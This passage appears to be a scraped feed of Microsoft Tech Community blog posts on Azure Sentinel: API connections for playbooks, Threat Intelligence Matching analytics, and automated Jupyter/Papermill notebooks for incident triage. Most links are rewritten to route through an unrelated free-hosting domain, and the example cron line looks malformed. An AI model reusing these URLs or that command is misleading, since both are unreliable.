<P><SPAN>&nbsp;</SPAN></P> <P>Note that when a user authorizes a connection, all actions will appear as they are performed by that specific user. (Unlike with Office 365 Outlook where we have the “From (Send As)” parameter, that is not an option in Microsoft Teams.)</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture27.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299021i233A05079AC8A149/image-size/large?v=v2&amp;px=999" role="button" title="Picture27.png" alt="Picture27.png" /></span></P> <P>&nbsp;</P> <P>As mentioned with Office 365 Outlook connection, we can have one specific user account, like <SPAN><A href="https://gorovian.000webhostapp.com/?exam=mailto:soc@xyz.com" target="_blank" rel="noopener">soc@xyz.com</A></SPAN>, which you will use to authorize Microsoft Teams connection and all actions will appear as if they have been initiated by <SPAN><A href="https://gorovian.000webhostapp.com/?exam=mailto:soc@xyz.com" target="_blank" rel="noopener">soc@xyz.com</A></SPAN>.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture28.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299022iA8E0A7C730A36AB2/image-size/large?v=v2&amp;px=999" role="button" title="Picture28.png" alt="Picture28.png" /></span></P> <P>&nbsp;</P> <P><SPAN>Thanks to our reviewers&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/user/viewprofilepage/user-id/215052" target="_blank" rel="noopener">@Jeremy Tan</A>&nbsp;,&nbsp;<LI-USER uid="94294"></LI-USER>&nbsp;and&nbsp;<LI-USER uid="66621"></LI-USER>&nbsp;.</SPAN></P> <P>&nbsp;</P> <P><SPAN>We hope you found this article useful, please leave us your feedback and questions in the comments section.</SPAN></P> <P>&nbsp;</P> Thu, 29 Jul 2021 17:28:14 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/understanding-api-connections-for-your-azure-sentinel-playbooks/ba-p/2593973 madesous 2021-07-29T17:28:14Z Microsoft Threat Intelligence Matching Analytics https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/microsoft-threat-intelligence-matching-analytics/ba-p/2525605 <P><FONT size="5"><STRONG>Introduction</STRONG></FONT></P> <P><FONT size="4">Azure Sentinel is a cloud native SIEM solution that allows various ways to bring your own threat intelligence data (BYOTI) like STIX/TAXII and from various Threat Intelligence Platforms.</FONT></P> <P><FONT size="4">Apart from bringing in your own threat intelligence data, you can also reference threat intelligence data produced by Microsoft for detection and analysis.</FONT></P> <P><FONT size="4">Today we are announcing launch of a new analytic rule called Microsoft Threat Intelligence Matching analytics that matches Microsoft generated threat intelligence data with your logs and generates high fidelity alerts/incidents with appropriate severity based on the context of the log. Once a match is generated, the indicator is published to your threat intelligence repository in Azure Sentinel.</FONT></P> <P>&nbsp;</P> <P><FONT size="4">In this blog, we will cover:</FONT></P> <OL> <LI><FONT size="4">Details and working of the Microsoft Threat Intelligence Matching analytics</FONT></LI> <LI><FONT size="4">How to enable Microsoft Threat Intelligence Matching analytics</FONT></LI> <LI><FONT size="4">Log sources and threat intelligence types used for matching by this rule</FONT></LI> <LI><FONT size="4">Alert grouping for incident generation and searching IOC’s published by this rule</FONT></LI> </OL> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Details and working of the Microsoft Threat Intelligence Matching analytics</STRONG></FONT></P> <P><FONT size="4">Microsoft Threat Intelligence matching analytics is an out of the box analytic rule offered to all Azure Sentinel customers. This rule matches your log data with <STRONG>Microsoft generated </STRONG>threat intelligence. Microsoft has a vast repository of threat intelligence data, and this analytic rule uses a subset of this threat intelligence data to generate high fidelity alerts and incidents for SOC teams to triage.</FONT></P> <P><FONT size="4">Currently, this rule matches <STRONG>domain</STRONG> indicators against the following log sources:</FONT></P> <OL> <LI><FONT size="4">Common Security Logs (CEF)</FONT></LI> <LI><FONT size="4">DNS logs</FONT></LI> <LI><FONT size="4">Syslog</FONT></LI> </OL> <P><FONT size="5"><STRONG>How to enable Microsoft Threat Intelligence Matching analytics</STRONG></FONT></P> <P><FONT size="4">Microsoft Threat Intelligence matching analytics can be discovered in the Analytic menu of Azure Sentinel.</FONT></P> <P><FONT size="4">Follow the below steps to enable this rule:</FONT></P> <OL> <LI><FONT size="4">Open the&nbsp;<A href="#" target="_blank" rel="noopener">Azure portal</A>&nbsp;and navigate to the&nbsp;<STRONG>Azure Sentinel</STRONG>&nbsp;service.</FONT></LI> <LI><FONT size="4">Choose the&nbsp;<STRONG>workspace</STRONG>&nbsp;in which you would like to enable this rule.</FONT></LI> <LI><FONT size="4">Select&nbsp;<STRONG>Analytics</STRONG>&nbsp;from the menu and search for “Microsoft Threat Intelligence Analytics” in the <STRONG>Rule Templates</STRONG> tab.</FONT></LI> <LI><FONT size="4">Click the <STRONG>Create Rule </STRONG>button and make the status of the rule as <STRONG>Enabled. </STRONG></FONT></LI> <LI><FONT size="4">Click the Next button and review all the details. Click Save.</FONT></LI> <LI><FONT size="4">Now the rule is enabled and will show up in the <STRONG>Active Rules</STRONG> tab.</FONT></LI> </OL> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 1.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294164i39D42DAB8A563B28/image-size/large?v=v2&amp;px=999" role="button" title="Image 1.png" alt="Image 1.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Log sources and threat intelligence types used for matching by this rule</STRONG></FONT></P> <P><FONT size="4">The Threat Intelligence Matcing analytic rule matches Microsoft threat intelligence with your log data. Currently, the following types of logs are available for matching:</FONT></P> <P><FONT size="4"><STRONG>1. Common Security Logs (CEF):</STRONG></FONT></P> <UL> <LI><FONT size="4">Matching is done for all CEF logs that are ingested in the <EM>CommonSecurityLog </EM>table of log analytics except for one that have DeviceVendor as “Cisco”.</FONT></LI> <LI><FONT size="4">To match Microsoft generated threat intelligence with CEF logs, please have the domain mapped in the “RequestURL” field of the CEF log.&nbsp;</FONT></LI> </UL> <P><FONT size="4"><STRONG>2.&nbsp;</STRONG><STRONG>DNS logs</STRONG></FONT></P> <UL> <LI><FONT size="4">Matching is done for all DNS logs which are lookup DNS queries from clients to DNS services (SubType == "LookupQuery"). Threat Intelligence matching analytics only processes DNS queries for IPv4 (QueryType=”A”) and IPv6 queries(QueryType=” AAAA”).</FONT></LI> <LI><FONT size="4">To match Microsoft generated threat intelligence with DNS logs, no manual mapping of columns is needed. All columns are standard from Windows DNS Server. The domains will be in “Name” column by standard.</FONT></LI> </UL> <P><FONT size="4"><STRONG>3. Syslog</STRONG></FONT></P> <UL> <LI><FONT size="4">Matching is done for Syslog events with Facility as “cron”. This will be extended to additional log types in the future.</FONT></LI> <LI><FONT size="4">To match Microsoft generated threat intelligence with Syslog, no manual mapping of columns is needed as the details come in the “SyslogMessage” field of the Syslog by default. The rule will parse the domain from the SyslogMessage.</FONT></LI> </UL> <P><FONT size="5"><STRONG>Alert grouping for incident generation and searching IOC’s published by this rule</STRONG></FONT></P> <P><FONT size="4">The Microsoft Threat Intelligence matching analytic generates alert every time a match is received. The rule performs alert grouping while generating incidents. The alerts are grouped on a per observable basis over a 24-hour timeframe. For example, all alerts generated in a 24-hour duration for a match with domain “abc.com” will be grouped in a single incident.</FONT></P> <P><FONT size="4">To triage through incidents generated by this analytic rule, you can follow the below steps:</FONT></P> <OL> <LI><FONT size="4">Open the&nbsp;<A href="#" target="_blank" rel="noopener">Azure portal</A>&nbsp;and navigate to the&nbsp;<STRONG>Azure Sentinel</STRONG>&nbsp;service.</FONT></LI> <LI><FONT size="4">Choose the&nbsp;<STRONG>workspace</STRONG>&nbsp;in which you have enabled this rule.</FONT></LI> <LI><FONT size="4">Select&nbsp;<STRONG>Incidents</STRONG>&nbsp;from the menu and search for “Microsoft threat Intelligence Analytics”.</FONT></LI> <LI><FONT size="4">If you have any incidents they will show up in the grid of incidents.</FONT></LI> <LI><FONT size="4">Click on the <STRONG>View full details </STRONG>button to view entities and other details about the incident like alerts.</FONT></LI> </OL> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 2.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294165i206CADAC84F73CD6/image-size/large?v=v2&amp;px=999" role="button" title="Image 2.png" alt="Image 2.png" /></span></FONT></P> <P><FONT size="4">Once a match is received, the indicator is also published to the <EM>ThreatIntelligenceIndicators</EM> table of log analytics and shows up in the Threat Intelligence menu. The indicators are stamped with the Source as “Microsoft Threat Intelligence Analytics”.</FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 3.png" style="width: 527px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294166i3FA04D6E11FBE345/image-size/large?v=v2&amp;px=999" role="button" title="Image 3.png" alt="Image 3.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 4.png" style="width: 528px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294167i29B10D79F80AFD2C/image-size/large?v=v2&amp;px=999" role="button" title="Image 4.png" alt="Image 4.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Conclusion</STRONG></FONT></P> <P><FONT size="4">Hopefully, this article has helped you understand how to leverage Microsoft generated threat intelligence matching analytics for generating high fidelity alerts and incidents and triage through them using the information provided with the indicator of compromise (IOC) published to the workspace.</FONT></P> Wed, 28 Jul 2021 17:01:40 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/microsoft-threat-intelligence-matching-analytics/ba-p/2525605 RijutaKapoor 2021-07-28T17:01:40Z Software Defined Monitoring - Using Automated Notebooks and Azure Sentinel to Improve Sec Ops https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/software-defined-monitoring-using-automated-notebooks-and-azure/ba-p/2587775 <P>Incident triage is a core component of security monitoring operations and ensuring triage processes are efficient and effective is key to detecting security threats. Recent high profile security incidents have shown that detecting threats is insufficient unless effective triage and investigation of them is conducted. In this blog we detail how to deploy and use a solution that allows for the automatic execution of Jupyter Notebooks to provide enrichment to incidents within Azure Sentinel. &nbsp;This process allows security analysts to triage incidents more quickly and effectively, as well as ensuring a consistent, quality approach is taken.</P> <P>&nbsp;</P> <H2>Background</H2> <P>The objective of this solution is to reduce the time and effort required for a Security Operations Center (SOC) analyst to triage an incident within Azure Sentinel and help ensure a consistent approach is taken to each incident. This is done by automatically executing Jupyter notebooks that perform a set of pre-defined actions on the incident like those conducted by an analyst when triaging an incident. It provides three main benefits:</P> <UL> <LI>It makes the triaging of incidents more efficient by running some logic against the incidents and adjusting incident severity based on the output of the enrichment run in the notebook.</LI> <LI>It makes the results of the enrichment easily viewable by the SOC analyst by adding a link to the executed notebook to the incident log. This saves the analysts valuable time when triaging the incident.</LI> <LI>By executing these steps from a template pattern, it provides a consistent triage approach for all incidents, helping to ensure quality and reduce the chance of a security incident being missed.</LI> </UL> <P>We refer to this approach of using notebook patterns to define and execute these processes as Software Defined Monitoring. To learn more about this approach please watch this recent webinar we presented on the subject</P> <P>&nbsp;</P> <P><LI-VIDEO vid="https://www.youtube.com/watch?v=pezPO5S_aaQ" align="center" size="medium" width="400" height="225" uploading="false" thumbnail="https://i.ytimg.com/vi/pezPO5S_aaQ/hqdefault.jpg" external="url"></LI-VIDEO></P> <P>&nbsp;</P> <H2>Contents</H2> <OL> <LI>Summary of the solution.</LI> <LI>Architecture overview.</LI> <LI>Deploying the solution. <OL> <LI>Collect required variables.</LI> <LI>Add variables to the notebook.</LI> <LI>Deploying Papermill infrastructure. <OL> <LI>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Deploying with ARM.</LI> <LI>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Manual deployment.</LI> </OL> </LI> <LI>Deploying KeyVault Access.</LI> <LI>Installing required packages.</LI> <LI>MSTICPy Config</LI> <LI>Optional - Using Azure Storage Queues to manage which incidents are triaged.</LI> </OL> </LI> <LI>Using the notebooks during incident triage.</LI> <LI>Troubleshooting.</LI> </OL> <P>&nbsp;</P> <H2>Summary of the solution</H2> <P>This document covers the end-to-end process to deploying this solution within an Azure subscription including all the requisite components for the automated notebook elements. Along with this document are two separate Jupyter Notebooks and an ARM template for deploying the required VM. The first notebook is the ‘AutomatedNotebooks-Manager.ipynb’ and the other is ‘AutomatedNotebooks-IncidentTriage.ipynb’’. These notebooks, along with the ARM template and a Python requirements firl can be downloaded from GitHub:</P> <UL> <LI><A href="#" target="_blank" rel="noopener">ARM Template</A></LI> <LI><A href="#" target="_blank" rel="noopener">Requirements file</A></LI> <LI><A href="#" target="_blank" rel="noopener">AutomatedNotebooks-Manager.ipynb</A></LI> <LI><A href="#" target="_blank" rel="noopener">AutomatedNotebooks-IncidentTriage.ipynb</A></LI> </UL> <P>&nbsp;</P> <P>In addition, these resources the following are pre-requisites:</P> <UL> <LI>An Azure subscription, with permissions to deploy resources within it.</LI> <LI>An Azure Virtual Machine (VM) to run the automated notebooks.</LI> <LI>An Azure Sentinel workspace.</LI> <LI>An Azure Key Vault, with the ability to read and write secrets to it.</LI> <LI>An Azure Machine Learning (ML) workspace.</LI> </UL> <H2>Architecture overview</H2> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Architecture.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298431i12B3E496D5323334/image-size/large?v=v2&amp;px=999" role="button" title="Architecture.png" alt="Architecture.png" /></span></P> <P>&nbsp;</P> <P>The core of the solution is an Azure VM that runs several Jupyter notebooks. The Manager notebook programmatically gets details of incidents from Azure Sentinel, if these match a set of criteria it then runs another notebook that performs triage and enrichment based on the entities attached to that incident. That completed triage notebook is then written to an Azure ML workspace, with a link to the notebook added as a comment to the incident in Azure Sentinel. From there the SOC analyst can follow the link to view and interact with the completed triage notebook. In addition, depending on the findings in the notebook the severity of the Incident is updated in Azure Sentinel.</P> <P>&nbsp;</P> <H2>Deploying the solution</H2> <H3>Collect required variables.</H3> <P>To deploy the solution, some configurable variables are first required:</P> <P>&nbsp; 1. The Azure <EM>Tenant ID</EM> where the resources being used are. <A href="#" target="_blank" rel="noopener">More details</A>.</P> <P>&nbsp; 2. The <EM>Subscription ID</EM> where your Azure Sentinel Workspace is deployed.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure Portal &gt; Azure Sentinel &gt; Settings &gt; Workspace settings &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="1.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298432i52342280289C4A43/image-size/large?v=v2&amp;px=999" role="button" title="1.png" alt="1.png" /></span>&nbsp; 3. The <EM>Resource Group</EM> name where your Azure Sentinel Workspace is deployed.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure Portal &gt; Azure Sentinel &gt; Settings &gt; Workspace settings &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="2.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298433i78E01B3DEC223398/image-size/large?v=v2&amp;px=999" role="button" title="2.png" alt="2.png" /></span></P> <P>&nbsp; 4. The <EM>Workspace Name</EM> of your Azure Sentinel Workspace.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure Portal &gt; Azure Sentinel &gt; Settings &gt; Workspace settings &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="3.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298434i56FA5F9D709F2698/image-size/large?v=v2&amp;px=999" role="button" title="3.png" alt="3.png" /></span></P> <P>&nbsp; 5. The <EM>Workspace ID</EM> of your Azure Sentinel Workspace.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure Portal &gt; Azure Sentinel &gt; Settings &gt; Workspace settings &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="4.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298435i5DDD942B9A30E1C1/image-size/large?v=v2&amp;px=999" role="button" title="4.png" alt="4.png" /></span></P> <P>&nbsp; 6. The <EM>Subscription ID</EM> where you Azure ML Workspace is deployed.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure portal &gt; under the Azure ML resource &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="5.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298437i47BE3D6FC97F69F4/image-size/large?v=v2&amp;px=999" role="button" title="5.png" alt="5.png" /></span></P> <P>&nbsp; 7. The <EM>Resource Group</EM> name where your Azure ML workspace is deployed.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure portal &gt; under the Azure ML resource &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="6.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298439iB9E5F29DA3B2E3F1/image-size/large?v=v2&amp;px=999" role="button" title="6.png" alt="6.png" /></span></P> <P>&nbsp; 8. The <EM>Azure ML Workspace</EM> name.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure portal &gt; under the Azure ML resource &gt; Overview</LI> </OL> <P>Note: in this example the workspace name is “AzureMLWorkspace”</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="7.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298440i0080E69B20AEF171/image-size/large?v=v2&amp;px=999" role="button" title="7.png" alt="7.png" /></span>&nbsp; 9.&nbsp;<SPAN style="font-family: inherit;">The name of the </SPAN><EM style="font-family: inherit;">Key Vault</EM><SPAN style="font-family: inherit;"> being used (see pre-requisites).</SPAN></P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure Portal &gt; Key Vault &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="8.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298441i86E6FD5CAEC4098F/image-size/large?v=v2&amp;px=999" role="button" title="8.png" alt="8.png" /></span></P> <P>&nbsp; 10. Another variable required is an <EM>Access Ke</EM>y for the Storage Account used by your Azure ML Workspace. Due to the sensitivity of this key we will store it in KeyVault in order to keep it secure. To find the storage account associated with your Azure ML workspace, find the Azure ML resource in the Azure Portal and browse to the Overview tab. Listed here will be a storage resource:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="storage.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298442i2FD7D1D7ACFFA373/image-size/large?v=v2&amp;px=999" role="button" title="storage.png" alt="storage.png" /></span></P> <P>Clicking on that resource will open it in the Azure Portal. From there select the Access Keys and you will be presented with two access keys. Select the Key value from one of these (it doesn’t matter which one you use), and then <A href="#" target="_blank" rel="noopener">add that as a Secret in your KeyVault</A>. When adding the Access Key make a note of the name you give the secret as it will be needed later in the set up. (Do not paste the storage key into notebook).</P> <P>&nbsp;</P> <H3>Adding variables to the notebook</H3> <P>Once the above elements have been collected the “AutomatedNotebooks-Manager.ipynb” notebook needs to be updated to include these values. They are all set in a single cell near the top of the notebook, simply open the notebook<A href="https://gorovian.000webhostapp.com/?exam=#_edn1" target="_blank" rel="noopener" name="_ednref1"><SPAN>[i]</SPAN></A> and replace the placeholder values with those collected above. The cell includes comments that detail where each value should go.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="10.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298443iEE540FE606B738A9/image-size/large?v=v2&amp;px=999" role="button" title="10.png" alt="10.png" /></span></P> <P>You will see sections in this cell for details of an Azure Storage Queue, these are optional setting which are covered later in this document (see the <A href="https://gorovian.000webhostapp.com/?exam=#_Queue_Management" target="_blank" rel="noopener">Queue Management</A> section).</P> <P>&nbsp;</P> <H3>Deploying Papermill infrastructure</H3> <P>The technology used to run the automated notebooks is <A href="#" target="_blank" rel="noopener">Papermill</A>. A dedicated Azure IaaS VM will be deployed to run the Papermill tasks. For this documentation we will document how to deploy an Ubuntu Linux host; however, the solution could also be deployed on a Windows host.</P> <P>&nbsp;</P> <H4>Deploying via ARM</H4> <P>To make deployment easier we have created an ARM template that deploys the VM and configures some of the required identity elements. If you want to deploy using this method the ARM template can be downloaded from <A href="#" target="_blank" rel="noopener">GitHub</A>, and you can find instructions on how to deploy it <A href="#" target="_blank" rel="noopener">here</A>.</P> <P>During deployment you will be asked to provide a number of parameters, these include:</P> <UL> <LI>The Resource Group you want to deploy the resources in.</LI> <LI>An SSH key to use to access the VM.</LI> <LI>The Subscription ID and Resource Group name where your Azure Sentinel workspace is (if different from the Resource Group that the VM is being deployed in).</LI> <LI>The Subscription ID and Resource Group name where your AzureML workspace is (if different from the Resource Group that the VM is being deployed in).</LI> </UL> <P>When deploying the ARM template you will be asked to provide these variables on the following page:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="11.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298445i59DB48B9BF294B25/image-size/large?v=v2&amp;px=999" role="button" title="11.png" alt="11.png" /></span></P> <P>If you deploy the VM via ARM you can skip ahead to the ‘Deploying KeyVault Access’ section.</P> <P>&nbsp;</P> <H4>Deploying Manually</H4> <P>When deploying Azure VMs we recommend that you <A href="#" target="_blank" rel="noopener">follow best practice</A> and secure access to the VM using Just In Time Access and Azure Defender.</P> <P>Detailed instructions on deploying a Linux VM in Azure can be found <A href="#" target="_blank" rel="noopener">here</A>. We recommend that a SKU with at least 2 vCPUs and 4 GiB memory is used.</P> <P>Once the VM is deployed its needs assigning a <EM>Managed Identity</EM>. This identity will be used by the Papermill process to access Azure Sentinel, as well as secrets stored in Azure Key Vault. This can be configured by browsing to the Azure VM created previously in the Azure Portal and selecting the <STRONG>Identity </STRONG>tab. From here select <STRONG>System Assigned</STRONG> and set the <STRONG>Status</STRONG> to <STRONG>On</STRONG>. Once enabled, you need to grant some required permissions to the VM managed identity. To do this, select <STRONG>Azure role assignments</STRONG></P> <P><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="12.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298446iC9BCFB349D46AB73/image-size/large?v=v2&amp;px=999" role="button" title="12.png" alt="12.png" /></span></STRONG></P> <P>The first permission is to access Azure Sentinel. The automated notebooks need to access incident details, query logs to gather context, and update incidents based on the output of their analysis. As such <EM>Azure Sentinel Responder</EM> role permissions are required. More details about this role can be <A href="#" target="_blank" rel="noopener">found here</A>. Currently, this role cannot be set directly on the Azure Sentinel workspace, so the role must be scoped at the Subscription or Resource Group level. We recommend that the Resource Group is used as it’s the lowest level of access available. Ensure that you select the Resource Group that contains the Azure Sentinel workspace you want to use.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="13.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298447i994984A696BD74D0/image-size/large?v=v2&amp;px=999" role="button" title="13.png" alt="13.png" /></span></P> <P>Finally, the papermill process needs to be able enumerate resources associated with the Azure ML Workspace being used. This is needed to locate the file store used by the Azure ML workspace so that executed notebooks can be written there. Therefore, the VM Managed Identity needs the Reader role assigned for the Resource Group that contains your Azure ML workspace.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="14.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298448iE78D4212578C36C2/image-size/large?v=v2&amp;px=999" role="button" title="14.png" alt="14.png" /></span></P> <H4>Deploying KeyVault Access</H4> <P>Regardless of how you deployed the VM you will need to manually configure an additional managed identity to access the Key Vault that we are using so that it can retrieve the secrets stored there. To do this open the VM you deployed in the Azure Portal and select the `Identity` section. From there select `Azure Role Assignments` and `Add Role Assignment`. As Key Vault is a specific resource available for Managed Identity role provision, you can select the specific Key Vault you are using for this solution<A href="https://gorovian.000webhostapp.com/?exam=#_edn1" target="_blank" rel="noopener" name="_ednref1"><SPAN>[i]</SPAN></A> once you have selected `Key Vault` as the scope. The `Key Vault Secrets User` role is required, more details on this role can be <A href="#" target="_blank" rel="noopener">found here.</A></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="15.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298449i09A932979C95B7CF/image-size/large?v=v2&amp;px=999" role="button" title="15.png" alt="15.png" /></span></P> <P>More details about Managed Identities can be <A href="#" target="_blank" rel="noopener">found here</A>.</P> <P>Note: your KeyVault needs to be configured for Role Based Access Control – more details can be found here: <A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/key-vault/general/rbac-guide?tabs=azure-cli</A></P> <H3>&nbsp;</H3> <H3>Installing required packages</H3> <P>With the VM deployed and the correct permissions assigned via a Managed Identity the next step is to install Papermill and the other required packages on our VM host. These require Python 3 to be installed first, if you deployed a Linux Ubuntu VM this will be installed by default and packages can be installed immediately. If another OS was deployed, you may need to first install Python 3.</P> <P>&nbsp;</P> <P style="border: solid 1px; padding: 10px; background-color: #fafaff;"><STRONG>Optional Step: </STRONG> To manage package installs you can choose to use a solution like Conda or Python virtualenv to create a dedicated Python environment for papermill to operate in. If you don’t plan on running anything except automated notebooks on a host this isn’t essential but might make future management easier. If you choose to do this, follow the steps bellow within your virtual environment, and when scheduling the regular task ensure you first activate your chosen virtual environment.</P> <P>&nbsp;</P> <P>The installation of packages will be done using <STRONG>pip;</STRONG> this first needs to be installed if not present. On an Ubuntu VM this can be done by running the command:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">sudo apt install python3-pip</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Note: you may need to first run `sudo apt update`</P> <P>To install the required packages download the autonb-requirements.txt file from <A href="#" target="_blank" rel="noopener">GitHub</A> and install the packages detailed in that file using <A href="#" target="_blank" rel="noopener">Pip</A> with the following command:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">python3 -m pip install -r autonb-requirements.txt</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Once installed, you need to ensure you add the papermill package to your $PATH and restart the terminal to ensure its available via the CLI.</P> <P>Once the packages are installed you will also need to configure a kernel to execute the notebooks with. This is done with ipykernel which you should have just installed with the above commands. You can create a new kernel called ‘papermill’ (this is the default kernel used the notebooks) with the following command:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">python3 -m ipykernel install --user --name papermill</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Once papermill and the required packages are installed and they kernel created, copy the two notebooks(‘AutomatedNotebooks-Manager.ipynb’ and ‘AutomatedNotebooks-IncidentTriage.ipynb’’) to the host. These should be stored in the same folder.</P> <P>&nbsp;</P> <H3>MSTICPy Config</H3> <P>In order to use threat intelligence providers as part of the incident triage notebook a msticpyconfig.yaml file containing details of those threat intelligence providers is required on the VM deployed. This should be placed in the same folder as the ‘AutomatedNotebooks-Manager.ipynb’ notebook and only needs to contain keys for TI providers and the incident triage notebook will use all primary providers configured. If you are using KeyVault to store these secrets you will also need to ensure that you assign the VM `Key Vault Secrets User` access to the KeyVault these are stored in as well.</P> <P>More details on the msticpyconf.yaml file and how to set it up can be found in the <A href="#" target="_blank" rel="noopener">MSTICPy documentation.</A></P> <P style="border: solid 1px; padding: 10px; background-color: #fafaff;"><STRONG>Optional Step: </STRONG>At this point we can test the configuration by manually triggering the notebooks. To do this ensure you have some incidents present in your Azure Sentinel workspace and then tell Papermill to manually trigger the scheduling notebook. To do this browse to the folder containing your notebooks and run the following command: papermill ‘AutomatedNotebooks-Manager.ipynb’ - This command will run the scheduling notebook and subsequently the incident triage notebooks. You will see the output of the notebook and execution in stdout and can triage this to ensure you don’t have any errors.</P> <P>&nbsp;</P> <P>Once the papermill configuration is complete and the notebooks set up, you can schedule the ‘AutomatedNotebooks-Manager.ipynb’ to be run on a regular basis. This notebook will check for new incidents and run the triage notebook against them. Scheduling is done by simply using the OS’s build-in scheduling service, in this case <EM>cron</EM>. The precise schedule to run this notebook can be tuned depending on your requirements, however, for the most immediate response to new incidents being created we suggest that this be set to run every 10 minutes.</P> <P>&nbsp;</P> <P>The scheduled command needs to a) navigate to the folder containing the notebooks and b) execute the ‘AutomatedNotebooks-Manager.ipynb’ notebook. An example cron entry to run the notebook every 10 minutes would be:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">*/10 * * * * cd &lt;path to notebooks folder&gt; &amp; papermill “AutomatedNotebooks-Manager.ipynb” SchedulerOut$ </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Once the schedule is set up, you will start to see incidents with comments that provide a link to a notebook in Azure ML. Only notebooks that include a significant finding are attached to incidents, otherwise the notebook is simply discarded.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="16.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298451i7C761521C175F92C/image-size/large?v=v2&amp;px=999" role="button" title="16.png" alt="16.png" /></span></P> <H3>&nbsp;</H3> <H2>Optional – Using Azure Storage Queues to manage which incidents are triaged</H2> <P>By default, the automated notebook process will run against all incidents raised in your Azure Sentinel Workspace. However, if you wish to only run the process against a subset 